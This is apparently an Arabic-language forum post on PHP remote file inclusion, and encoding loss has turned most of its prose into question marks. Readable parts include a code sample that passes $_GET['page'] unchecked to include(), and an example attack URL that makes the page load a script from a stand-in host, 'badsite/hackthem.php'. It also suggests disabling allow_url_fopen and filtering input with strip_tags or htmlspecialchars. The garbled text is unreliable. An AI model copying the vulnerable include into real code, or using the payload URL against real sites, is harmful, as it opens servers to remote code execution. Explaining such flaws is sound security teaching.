???? ????? ?????? ??????? ?? ???
http://www.phpbb.com/community/viewtopi ... a&start=45" onclick="window.open(this.href);return false;

????? ??? ?? ?????? ???? ????? ?? ????? ??? allow_url_fopen ???? ?? ?????? ???? ?? ???? ???? ?? ?? ??????? ??? ?? ????? ??? ?????? ?? ??????? ??? ??????? ??????? ???????? ?? ??? ????????? ?????? ??? php ???? ????? ?????? ?????? ???????
allow_url_fopen ???? ?? ???? ?????? ??????? ??? ?? ?????? ??? ??? ??? iframe
????? ??? ?? ?? ????? ???? ????? ???? ????? ???? ??? ?????. ???? ?????? ?? ??????? ??? ????? ?????? ????? ???? ?????? ?????? ..........

??? ???? ???? ????? !!!
???? ??? ???? ?? ???? ???? ???? ?????? ?????? ????????? ???? ?? ????? ???? ??????? ??? iframe
????? ?????? ??? ???? (??????) ???? (???????) ??? (???????) ????? ?? ???? ????? ??????? ?? ???? ???? ?????????
???? ???? ???? ??? contact ?? ???? ???????? ???? ??? ?????? ???????? index.php?page=contact.php
???? ???? ????? ????? ???? ????? ????? ?????? ??????? ?? ???????
كود: تحديد الكل
//??? ??? ???? ?????? ???? ?? ??? ????? ?? ???? ??????
if ($_GET["page"] == NULL)
{
//???? ?????? ???????
include("page_main.php");
}
//??? ??? ??? ??? ???
else
{
//???? ?????? ?????? ?? ??????? ???? ?? ??????
include("$_GET[page]");
}
??? !!! ??? ???? ?????? allow_url_fopen ?????? ???? ??????? ?? ???????? ???? ?????? ?????
????? ?? ?? ???? ??? ????? ??? php ?????? ???? ???? ???? ???? ??????? ?????? **?? ?????? ?????? ?? ??? ???? ???????** ??????? ??? ???? ?? ???? ????? ??????
index.php?page=
http://badsite/hackthem.php
????? ?????? ?? ?????
كود: تحديد الكل
include("http://badsite/hackthem.php");
???? ?? ?????? allow_url_fopen ??????? ????? hackthem.php ???? ?? ????? ????? ???? ??? ?????? ??? ??? ???? ?? ??? ????? ??????? ?? ?????
??? ??? ???? ???? ??? allow_url_fopen ????? ??? ???? ????? ???? ????? (??? ??????? ???????).
??? ??? ??? ?? ?? ?????? ??? allow_url_fopen ????? ??????? ???? ??? php ??????? ?????? ?? ??? ????????? ???????
كود: تحديد الكل
strip_tags()
nl2br()
htmlspecialchars()
???? ??? ???? ???? ?????? ?? ???? php ?????? ????? ????????? ???? ?? ????? ????????